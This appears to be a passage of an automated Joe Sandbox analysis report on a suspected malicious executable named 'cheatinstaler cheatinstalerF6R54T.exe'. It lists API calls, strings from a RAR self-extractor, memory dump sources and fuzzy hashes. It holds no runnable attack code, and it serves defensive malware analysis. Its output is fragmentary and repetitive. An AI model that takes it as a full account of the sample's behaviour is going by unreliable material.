                                                                                                  Similarity
                                                                                                  • API ID: Item$Text
                                                                                                  • String ID: LICENSEDLG
                                                                                                  APIs
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.1267073404.00007FF6C16B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6C16B0000, based on PE: true
                                                                                                  Similarity
                                                                                                  • API ID: AddressProc$CurrentDirectoryProcessSystem
                                                                                                  • String ID: Crypt32.dll$CryptProtectMemory$CryptProtectMemory failed$CryptUnprotectMemory$CryptUnprotectMemory failed
                                                                                                  APIs
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.1267073404.00007FF6C16B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6C16B0000, based on PE: true
                                                                                                  Similarity
                                                                                                  • API ID: _invalid_parameter_noinfo_noreturn
                                                                                                  • String ID: $
                                                                                                  APIs
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.1267073404.00007FF6C16B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6C16B0000, based on PE: true
                                                                                                  Similarity
                                                                                                  • API ID: Is_bad_exception_allowedabortstd::bad_alloc::bad_alloc
                                                                                                  • String ID: csm$csm$csm
                                                                                                  APIs
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.1267073404.00007FF6C16B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6C16B0000, based on PE: true
                                                                                                  Similarity
                                                                                                  • API ID: AllocClearStringVariant
                                                                                                  • String ID: Name$ROOT\CIMV2$SELECT * FROM Win32_OperatingSystem$WQL$Windows 10
                                                                                                  APIs
                                                                                                  • LoadLibraryExW.KERNEL32(?,?,00000000,00007FF6C16E74F3,?,?,?,00007FF6C16E525E,?,?,?,00007FF6C16E5219), ref: 00007FF6C16E7371
                                                                                                  • GetLastError.KERNEL32(?,?,00000000,00007FF6C16E74F3,?,?,?,00007FF6C16E525E,?,?,?,00007FF6C16E5219), ref: 00007FF6C16E737F
                                                                                                  • LoadLibraryExW.KERNEL32(?,?,00000000,00007FF6C16E74F3,?,?,?,00007FF6C16E525E,?,?,?,00007FF6C16E5219), ref: 00007FF6C16E73A9
                                                                                                  • FreeLibrary.KERNEL32(?,?,00000000,00007FF6C16E74F3,?,?,?,00007FF6C16E525E,?,?,?,00007FF6C16E5219), ref: 00007FF6C16E73EF
                                                                                                  • GetProcAddress.KERNEL32(?,?,00000000,00007FF6C16E74F3,?,?,?,00007FF6C16E525E,?,?,?,00007FF6C16E5219), ref: 00007FF6C16E73FB
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.1267073404.00007FF6C16B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6C16B0000, based on PE: true
                                                                                                  Similarity
                                                                                                  • API ID: Library$Load$AddressErrorFreeLastProc
                                                                                                  • String ID: api-ms-
                                                                                                  APIs
                                                                                                  • GetModuleHandleW.KERNEL32(?,?,?,00007FF6C16E1573,?,?,?,00007FF6C16E192A), ref: 00007FF6C16E162B
                                                                                                  • GetProcAddress.KERNEL32(?,?,?,00007FF6C16E1573,?,?,?,00007FF6C16E192A), ref: 00007FF6C16E1648
                                                                                                  • GetProcAddress.KERNEL32(?,?,?,00007FF6C16E1573,?,?,?,00007FF6C16E192A), ref: 00007FF6C16E1664
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.1267073404.00007FF6C16B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6C16B0000, based on PE: true
                                                                                                  Similarity
                                                                                                  • API ID: AddressProc$HandleModule
                                                                                                  • String ID: AcquireSRWLockExclusive$KERNEL32.DLL$ReleaseSRWLockExclusive
                                                                                                  APIs
                                                                                                    • Part of subcall function 00007FF6C16C51A4: GetVersionExW.KERNEL32 ref: 00007FF6C16C51D5
                                                                                                  • FileTimeToLocalFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000001,00007FF6C16B5AB4), ref: 00007FF6C16CED8C
                                                                                                  • FileTimeToSystemTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000001,00007FF6C16B5AB4), ref: 00007FF6C16CED98
                                                                                                  • SystemTimeToTzSpecificLocalTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000001,00007FF6C16B5AB4), ref: 00007FF6C16CEDA8
                                                                                                  • SystemTimeToFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000001,00007FF6C16B5AB4), ref: 00007FF6C16CEDB6
                                                                                                  • SystemTimeToFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000001,00007FF6C16B5AB4), ref: 00007FF6C16CEDC4
                                                                                                  • FileTimeToSystemTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000001,00007FF6C16B5AB4), ref: 00007FF6C16CEE05
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.1267073404.00007FF6C16B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6C16B0000, based on PE: true
                                                                                                  Similarity
                                                                                                  • API ID: Time$File$System$Local$SpecificVersion
                                                                                                  • String ID:
                                                                                                  • API String ID: 2092733347-0
                                                                                                  Similarity
                                                                                                  • API ID: Time$File$System$Local$SpecificVersion
                                                                                                  • String ID:
                                                                                                  • API String ID: 2092733347-0
                                                                                                  Similarity
                                                                                                  • API ID: _invalid_parameter_noinfo_noreturn
                                                                                                  • String ID: .rar$exe$rar$sfx
                                                                                                  • API String ID: 3668304517-630704357
                                                                                                  Similarity
                                                                                                  • API ID: abort$CallEncodePointerTranslator
                                                                                                  • String ID: MOC$RCC
                                                                                                  • API String ID: 2889003569-2084237596
                                                                                                  Similarity
                                                                                                  • API ID: CurrentImageNonwritableUnwind__except_validate_context_record
                                                                                                  • String ID: csm$f
                                                                                                  • API String ID: 2395640692-629598281
                                                                                                  Similarity
                                                                                                  • API ID: ErrorLast_invalid_parameter_noinfo_noreturn$CloseCurrentHandleProcess
                                                                                                  • String ID: SeRestorePrivilege$SeSecurityPrivilege
                                                                                                  • API String ID: 2102711378-639343689
                                                                                                  Similarity
                                                                                                  • API ID: Window$Show$Rect
                                                                                                  • String ID: RarHtmlClassName
                                                                                                  • API String ID: 2396740005-1658105358
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: RENAMEDLG$REPLACEFILEDLG
                                                                                                  • API String ID: 0-56093855
                                                                                                  Similarity
                                                                                                  • API ID: AddressFreeHandleLibraryModuleProc
                                                                                                  • String ID: CorExitProcess$mscoree.dll
                                                                                                  • API String ID: 4061214504-1276376045
                                                                                                  Similarity
                                                                                                  • API ID: _invalid_parameter_noinfo
                                                                                                  • String ID:
                                                                                                  • API String ID: 3215553584-0
                                                                                                  APIs
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.1267073404.00007FF6C16B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6C16B0000, based on PE: true
                                                                                                  Similarity
                                                                                                  • API ID: File$Create$CloseHandleTime_invalid_parameter_noinfo_noreturn
                                                                                                  • String ID:
                                                                                                  • API String ID: 2398171386-0
                                                                                                  APIs
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.1267073404.00007FF6C16B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6C16B0000, based on PE: true
                                                                                                  Similarity
                                                                                                  • API ID: FileWrite$ByteCharConsoleErrorLastMultiWide
                                                                                                  • String ID:
                                                                                                  • API String ID: 3659116390-0
                                                                                                  APIs
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.1267073404.00007FF6C16B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6C16B0000, based on PE: true
                                                                                                  Similarity
                                                                                                  • API ID: ByteCharMultiWide$AllocString
                                                                                                  • String ID:
                                                                                                  • API String ID: 262959230-0
                                                                                                  APIs
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.1267073404.00007FF6C16B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6C16B0000, based on PE: true
                                                                                                  Similarity
                                                                                                  • API ID: AddressProc
                                                                                                  • String ID:
                                                                                                  • API String ID: 190572456-0
                                                                                                  APIs
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.1267073404.00007FF6C16B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6C16B0000, based on PE: true
                                                                                                  Similarity
                                                                                                  • API ID: _set_statfp
                                                                                                  • String ID:
                                                                                                  • API String ID: 1156100317-0
                                                                                                  APIs
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.1267073404.00007FF6C16B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6C16B0000, based on PE: true
                                                                                                  Similarity
                                                                                                  • API ID: Message$DispatchObjectPeekSingleTranslateWait
                                                                                                  • String ID:
                                                                                                  • API String ID: 3621893840-0
                                                                                                  APIs
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.1267073404.00007FF6C16B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6C16B0000, based on PE: true
                                                                                                  Similarity
                                                                                                  • API ID: __except_validate_context_recordabort
                                                                                                  • String ID: csm$csm
                                                                                                  • API String ID: 746414643-3733052814
                                                                                                  APIs
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.1267073404.00007FF6C16B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6C16B0000, based on PE: true
                                                                                                  Similarity
                                                                                                  • API ID: _invalid_parameter_noinfo
                                                                                                  • String ID: $*
                                                                                                  • API String ID: 3215553584-3982473090
                                                                                                  APIs
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.1267073404.00007FF6C16B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6C16B0000, based on PE: true
                                                                                                  Similarity
                                                                                                  • API ID: ByteCharMultiWide$StringType
                                                                                                  • String ID: $%s
                                                                                                  • API String ID: 3586891840-3791308623
                                                                                                  APIs
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.1267073404.00007FF6C16B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6C16B0000, based on PE: true
                                                                                                  Similarity
                                                                                                  • API ID: CreateFrameInfo__except_validate_context_recordabort
                                                                                                  • String ID: csm
                                                                                                  • API String ID: 2466640111-1018135373
                                                                                                  • Opcode ID: ef48871438151390fa300b301edbe87f2aaf35895cd4fd9de5e2d21b12dcaab2
                                                                                                  • Instruction ID: d1f487429f8ed418e12546c92ac6f906f30327b2143cee5c91969d1fc0ae32db
                                                                                                  • Opcode Fuzzy Hash: ef48871438151390fa300b301edbe87f2aaf35895cd4fd9de5e2d21b12dcaab2
                                                                                                  • Instruction Fuzzy Hash: 6F518E7662874287DB20AF26E94026E77A4FB88B91F040234EBCD87B55CF38E551DB80
                                                                                                  APIs
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.1267073404.00007FF6C16B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6C16B0000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_7ff6c16b0000_cheatinstaler cheatinstalerF6R54T.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: ByteCharErrorFileLastMultiWideWrite
                                                                                                  • String ID: U
                                                                                                  • API String ID: 2456169464-4171548499
                                                                                                  • Opcode ID: a3c4996b5397ae7c68c43f4944c85cd830f0b958292ccb38960a62bfe152ddee
                                                                                                  • Instruction ID: 550ab45bf1337d40257c3c495ba42e798a9d0935f1360e1cb9ab0d91b26adc2e
                                                                                                  • Opcode Fuzzy Hash: a3c4996b5397ae7c68c43f4944c85cd830f0b958292ccb38960a62bfe152ddee
                                                                                                  • Instruction Fuzzy Hash: C341AE22B19A8182EB208F26E8443AA67A1FB88795F844131EECDC7B88DF7CD451D744
                                                                                                  APIs
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.1267073404.00007FF6C16B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6C16B0000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_7ff6c16b0000_cheatinstaler cheatinstalerF6R54T.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: ObjectRelease
                                                                                                  • String ID:
                                                                                                  • API String ID: 1429681911-3916222277
                                                                                                  • Opcode ID: 0b5772d91688d342ea342be5c9c3c9ea07a5ad9e93d570546deb1a9808731c40
                                                                                                  • Instruction ID: be82a17ebcb2445e40d69a0a2abe587a37ff7e6f2587f02b94f24cbce8c8134d
                                                                                                  • Opcode Fuzzy Hash: 0b5772d91688d342ea342be5c9c3c9ea07a5ad9e93d570546deb1a9808731c40
                                                                                                  • Instruction Fuzzy Hash: A1312D3561874286EB15DF13B82862AB7A1F789FD2F604435ED8E83B55CE3CE449CB10
                                                                                                  APIs
                                                                                                  • InitializeCriticalSection.KERNEL32(?,?,?,00007FF6C16D317F,?,?,00001000,00007FF6C16BE51D), ref: 00007FF6C16CE8BB
                                                                                                  • CreateSemaphoreW.KERNEL32(?,?,?,00007FF6C16D317F,?,?,00001000,00007FF6C16BE51D), ref: 00007FF6C16CE8CB
                                                                                                  • CreateEventW.KERNEL32(?,?,?,00007FF6C16D317F,?,?,00001000,00007FF6C16BE51D), ref: 00007FF6C16CE8E4
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.1267073404.00007FF6C16B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6C16B0000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_7ff6c16b0000_cheatinstaler cheatinstalerF6R54T.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: Create$CriticalEventInitializeSectionSemaphore
                                                                                                  • String ID: Thread pool initialization failed.
                                                                                                  • API String ID: 3340455307-2182114853
                                                                                                  • Opcode ID: 6610cce2f1ff4f40d78c24fcbab0d777ace7136147ab701da82aad1b7a389e44
                                                                                                  • Instruction ID: c4c5a8dfbfb5114626faab7a79fe3e9e9d600c3cf82fbd8ae7fa546be9577978
                                                                                                  • Opcode Fuzzy Hash: 6610cce2f1ff4f40d78c24fcbab0d777ace7136147ab701da82aad1b7a389e44
                                                                                                  • Instruction Fuzzy Hash: 68213D32F1564286FB108F26D4547FD36A2FB94B0EF288034CACD8A295DF7E9455D780
                                                                                                  APIs
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.1267073404.00007FF6C16B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6C16B0000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_7ff6c16b0000_cheatinstaler cheatinstalerF6R54T.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: CapsDeviceRelease
                                                                                                  • String ID:
                                                                                                  • API String ID: 127614599-3916222277
                                                                                                  • Opcode ID: a42f7bf34e2550c06df92b4c4441a28b155cc5d7cfc3f2a0da00e80f490195b4
                                                                                                  • Instruction ID: 23163b558febeafb6fecbd4f182068d7fe25da7fd142acbacf5ee956a30455a3
                                                                                                  • Opcode Fuzzy Hash: a42f7bf34e2550c06df92b4c4441a28b155cc5d7cfc3f2a0da00e80f490195b4
                                                                                                  • Instruction Fuzzy Hash: 79E0C220B0CA4186FB085BB7B5A903E6261AB4CBD1F258035DA5F83795CE3CC4C44310
                                                                                                  APIs
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.1267073404.00007FF6C16B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6C16B0000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_7ff6c16b0000_cheatinstaler cheatinstalerF6R54T.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: _invalid_parameter_noinfo_noreturn$FileTime
                                                                                                  • String ID:
                                                                                                  • API String ID: 1137671866-0
                                                                                                  • Opcode ID: 6a66750d7d38e285348c6a4672a5517d432b12a502a6a2b91e6f62eece89d76d
                                                                                                  • Instruction ID: 6831ce9ed5502fe12f1c0358791c209b82fdd1e1ca072f804e81f68e07ad8473
                                                                                                  • Opcode Fuzzy Hash: 6a66750d7d38e285348c6a4672a5517d432b12a502a6a2b91e6f62eece89d76d
                                                                                                  • Instruction Fuzzy Hash: CDA1B262A18B8281EB10DF66E8502ED6371FF85799F405131EADD87AE9DF3CE544E700
                                                                                                  APIs
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.1267073404.00007FF6C16B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6C16B0000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_7ff6c16b0000_cheatinstaler cheatinstalerF6R54T.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: ErrorLast
                                                                                                  • String ID:
                                                                                                  • API String ID: 1452528299-0
                                                                                                  • Opcode ID: a1a85338bd98e6dbbf4cbb69018a0b2acca20fb05f372e3efc38fb1d82780d4d
                                                                                                  • Instruction ID: f81e5b21798c1051cd6aeee541b91974bfa5126928140ccc53aece151693b761
                                                                                                  • Opcode Fuzzy Hash: a1a85338bd98e6dbbf4cbb69018a0b2acca20fb05f372e3efc38fb1d82780d4d
                                                                                                  • Instruction Fuzzy Hash: B451B262B14A4695FB00AF7AD4542FC2321EF85BD9F504235EADC977D6EE2CD640E340
                                                                                                  APIs
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.1267073404.00007FF6C16B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6C16B0000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_7ff6c16b0000_cheatinstaler cheatinstalerF6R54T.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: CreateCurrentDirectoryErrorFreeLastLocalProcess
                                                                                                  • String ID:
                                                                                                  • API String ID: 1077098981-0
                                                                                                  • Opcode ID: 91dec681af915968dd102d853b3eeeabd4842e789cbe2ad92d88e952f467e522
                                                                                                  • Instruction ID: c1efd8766e994ed311c2ea6673c262dca0cfff8fffdab0e826236b45dddbb270
                                                                                                  • Opcode Fuzzy Hash: 91dec681af915968dd102d853b3eeeabd4842e789cbe2ad92d88e952f467e522
                                                                                                  • Instruction Fuzzy Hash: 81517032A18B8286EB50DF22E4447AE7364FB85B85F601135EACE97B54DF3CD504CB40
                                                                                                  APIs
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.1267073404.00007FF6C16B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6C16B0000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_7ff6c16b0000_cheatinstaler cheatinstalerF6R54T.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: _invalid_parameter_noinfo$ByteCharErrorLastMultiWide
                                                                                                  • String ID:
                                                                                                  • API String ID: 4141327611-0
                                                                                                  • Opcode ID: fdb879c7c344a6dcddabd48f24568e2f5e84c2dc3f6ceef9c32cec135b3ccbbf
                                                                                                  • Instruction ID: 2647fa5e31b2153e306b7c4eb16dae530f785fc41f7981f498233996392f40e3
                                                                                                  • Opcode Fuzzy Hash: fdb879c7c344a6dcddabd48f24568e2f5e84c2dc3f6ceef9c32cec135b3ccbbf
                                                                                                  • Instruction Fuzzy Hash: 9041D472A0C64246FB618F12D840379A294EF90FD2F148231DACD87AC5DF7CDA51A780
                                                                                                  APIs
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.1267073404.00007FF6C16B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6C16B0000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_7ff6c16b0000_cheatinstaler cheatinstalerF6R54T.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: FileMove_invalid_parameter_noinfo_noreturn
                                                                                                  • String ID:
                                                                                                  • API String ID: 3823481717-0
                                                                                                  • Opcode ID: 47dbf0decc8272d9a7ae459b130201949f9107b8ec80fb87a20ec63cf3da1f82
                                                                                                  • Instruction ID: 381222e7e1d4b07565498eb521d67cef181f4d2581a2ee718292eb4198c0ebb8
                                                                                                  • Opcode Fuzzy Hash: 47dbf0decc8272d9a7ae459b130201949f9107b8ec80fb87a20ec63cf3da1f82
                                                                                                  • Instruction Fuzzy Hash: 2141AD62F14B5284FF00DFAAE8541AC2372BF44BA9B009235DEDDA7A99EF38D451D240
                                                                                                  APIs
                                                                                                  • GetEnvironmentStringsW.KERNEL32(?,?,?,?,?,?,?,00007FF6C16EC45B), ref: 00007FF6C16F0B91
                                                                                                  • WideCharToMultiByte.KERNEL32(?,?,?,?,?,?,?,00007FF6C16EC45B), ref: 00007FF6C16F0BF3
                                                                                                  • WideCharToMultiByte.KERNEL32(?,?,?,?,?,?,?,00007FF6C16EC45B), ref: 00007FF6C16F0C2D
                                                                                                  • FreeEnvironmentStringsW.KERNEL32(?,?,?,?,?,?,?,00007FF6C16EC45B), ref: 00007FF6C16F0C57
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.1267073404.00007FF6C16B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6C16B0000, based on PE: true
                                                                                                  • Associated: 00000003.00000002.1267036357.00007FF6C16B0000.00000002.00000001.01000000.00000007.sdmp
                                                                                                  • Associated: 00000003.00000002.1267113868.00007FF6C16F8000.00000002.00000001.01000000.00000007.sdmp
                                                                                                  • Associated: 00000003.00000002.1267138552.00007FF6C170B000.00000004.00000001.01000000.00000007.sdmp
                                                                                                  • Associated: 00000003.00000002.1267138552.00007FF6C1714000.00000004.00000001.01000000.00000007.sdmp
                                                                                                  • Associated: 00000003.00000002.1267257764.00007FF6C171A000.00000002.00000001.01000000.00000007.sdmp
                                                                                                  • Associated: 00000003.00000002.1267257764.00007FF6C171E000.00000002.00000001.01000000.00000007.sdmp
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_7ff6c16b0000_cheatinstaler cheatinstalerF6R54T.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: ByteCharEnvironmentMultiStringsWide$Free
                                                                                                  • String ID:
                                                                                                  • API String ID: 1557788787-0
                                                                                                  Similarity
                                                                                                  • API ID: ErrorLast$abort
                                                                                                  • String ID:
                                                                                                  • API String ID: 1447195878-0
                                                                                                  Similarity
                                                                                                  • API ID: CapsDevice$Release
                                                                                                  • String ID:
                                                                                                  • API String ID: 1035833867-0
                                                                                                  Similarity
                                                                                                  • API ID: _invalid_parameter_noinfo_noreturn
                                                                                                  • String ID: DXGIDebug.dll
                                                                                                  • API String ID: 3668304517-540382549
                                                                                                  Similarity
                                                                                                  • API ID: _invalid_parameter_noinfo
                                                                                                  • String ID: e+000$gfff
                                                                                                  • API String ID: 3215553584-3030954782
                                                                                                  Similarity
                                                                                                  • API ID: _invalid_parameter_noinfo_noreturn$swprintf
                                                                                                  • String ID: SIZE
                                                                                                  • API String ID: 449872665-3243624926
                                                                                                  Strings
                                                                                                  • C:\Users\user\AppData\Local\Temp\cheatinstaler cheatinstalerF6R54T.exe, xrefs: 00007FF6C16EC2F9
                                                                                                  Similarity
                                                                                                  • API ID: FileModuleName_invalid_parameter_noinfo
                                                                                                  • String ID: C:\Users\user\AppData\Local\Temp\cheatinstaler cheatinstalerF6R54T.exe
                                                                                                  • API String ID: 3307058713-368138684
                                                                                                  Similarity
                                                                                                  • API ID: Item$Text$Dialog
                                                                                                  • String ID: ASKNEXTVOL
                                                                                                  • API String ID: 2638039312-3402441367
                                                                                                  Similarity
                                                                                                  • API ID: ByteCharMultiWide_snwprintf
                                                                                                  • String ID: $%s$@%s
                                                                                                  • API String ID: 2650857296-834177443
                                                                                                  Similarity
                                                                                                  • API ID: FileHandleType
                                                                                                  • String ID: @
                                                                                                  • API String ID: 3000768030-2766056989
                                                                                                  APIs
                                                                                                  • RtlPcToFileHeader.KERNEL32(?,?,?,?,?,?,?,?,?,00007FF6C16E1D3E), ref: 00007FF6C16E40BC
                                                                                                  • RaiseException.KERNEL32(?,?,?,?,?,?,?,?,?,00007FF6C16E1D3E), ref: 00007FF6C16E4102
                                                                                                  Strings
                                                                                                  Similarity
                                                                                                  • API ID: ExceptionFileHeaderRaise
                                                                                                  • String ID: csm
                                                                                                  • API String ID: 2573137834-1018135373
                                                                                                  APIs
                                                                                                  • WaitForSingleObject.KERNEL32(?,?,?,?,?,?,?,?,00007FF6C16CE95F,?,?,?,00007FF6C16C463A,?,?,?), ref: 00007FF6C16CEA63
                                                                                                  • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,00007FF6C16CE95F,?,?,?,00007FF6C16C463A,?,?,?), ref: 00007FF6C16CEA6E
                                                                                                  Strings
                                                                                                  Similarity
                                                                                                  • API ID: ErrorLastObjectSingleWait
                                                                                                  • String ID: WaitForMultipleObjects error %d, GetLastError %d
                                                                                                  • API String ID: 1211598281-2248577382
                                                                                                  APIs
                                                                                                  Strings
                                                                                                  Similarity
                                                                                                  • API ID: FindHandleModuleResource
                                                                                                  • String ID: RTL
                                                                                                  • API String ID: 3537982541-834975271